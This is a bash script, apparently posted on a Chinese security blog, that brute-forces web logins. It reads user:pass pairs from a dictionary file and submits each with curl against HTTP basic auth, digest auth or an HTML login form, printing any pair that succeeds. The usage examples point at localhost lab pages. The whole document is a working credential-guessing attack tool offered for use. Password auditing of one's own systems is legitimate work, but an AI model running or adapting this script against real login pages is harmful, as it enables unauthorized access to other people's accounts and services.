http_cracker.sh

#!/bin/bash

help () {
    echo " ---------------- HTTP Cracker v1.0 (20151206) ---------------------- "
    echo " -u [URL] set the url for crack "
    echo " -d [filename] a dic file contain many user:pass line"
    echo " -m [mode] set the crack mode {0:basic 1:digest 2:form}, default is 0 "
    echo " -s [strings] set error string for the form mode "
    echo " -g manual get error string for the form mode "
    echo
    echo " example: "
    echo " 1. http_cracker.sh -u \"http://127.0.0.1:80/auth_basic/\" -d 1.txt -m 0 "
    echo " 2. http_cracker.sh -u \"http://127.0.0.1:80/auth_digest/\" -d 1.txt -m 1 "
    echo " 3. http_cracker.sh -u \"http://127.0.0.1/web_vul/login.php@username={USER}&password={PASS}\" -d 1.txt -m 2 -g "
    echo " 4. http_cracker.sh -u \"http://127.0.0.1/web_vul/login.php@username={USER}&password={PASS}\" -d 1.txt -m 2 -s \"Yahei\" "
    echo " -------------------------------------------------------------------- "
    exit 1
}

while getopts ":u:d:m:s:g" Option
do
    case $Option in
        u )
            opt_url=$OPTARG
        ;;
        d )
            opt_dic=$OPTARG
        ;;
        m )
            opt_mode=$OPTARG
        ;;
        s )
            opt_string=$OPTARG
        ;;
        g )
            opt_get=1
        ;;
    esac
done
shift $(($OPTIND - 1))

[ -z $opt_url ] && help
[ -z $opt_dic ] && help

[ -z $opt_mode ] && opt_mode=0
[ -z $opt_get ] && opt_get=0

[ 2 == $opt_mode ] && [ 0 == $opt_get ] && [ -z $opt_string ] && help

var_sock_timeout=3
var_pairs_delim=':'

echo 'Running...'
for var_pairs in $(cat $opt_dic)
do
    user=`echo $var_pairs | cut -d $var_pairs_delim -f 1`
    pass=`echo $var_pairs | cut -d $var_pairs_delim -f 2`

    if [ 0 == $opt_mode ]; then
        ret=$(curl --user-agent "" -m $var_sock_timeout -s -I $opt_url --basic -u $user:$pass)
        [ -z "$ret" ] && printf "err: connect timeout! [%s]\n" $opt_url && break
        ret=`echo "$ret" | awk 'NR==1 {print $3}'`
        [ -z `echo $ret | grep 'Unauthorized'` ] && echo -e "\n[$user:$pass] is Found!!! [$opt_url]" && break
    elif [ 1 == $opt_mode ]; then
        ret=`curl --user-agent "" -m $var_sock_timeout -s -I $opt_url --digest -u $user:$pass`
        [ -z "$ret" ] && printf "err: connect timeout! [%s]\n" $opt_url && break
        ret=`echo "$ret" | grep 'HTTP/1.1 200 OK'`
        [ ! -z "$ret" ] && echo && echo "[$user:$pass] is Found!!! [$opt_url]" && break
    elif [ 2 == $opt_mode ]; then
        var_http_form_url=`echo $opt_url | cut -d '@' -f 1`
        var_http_form_dat=`echo $opt_url | cut -d '@' -f 2`
        var_http_form_dat=${var_http_form_dat/\{USER\}/$user}
        var_http_form_dat=${var_http_form_dat/\{PASS\}/$pass}
        ret=`curl --user-agent "" -m $var_sock_timeout -s $var_http_form_url --data "$var_http_form_dat"`
        [ -z "$ret" ] && printf "err: connect timeout! [%s]\n" $opt_url && break
        if [ 1 == $opt_get ]; then
            echo "$ret" && break
        else
            ret=`echo "$ret" | grep "$opt_string"`
            [ -z "$ret" ] && echo -e "\n[$user:$pass] is Found!!! [$opt_url]" && break
        fi
    fi

    echo -n '*'
done

echo
echo 'Game Over'
echo

你可能感兴趣的:(信息安全)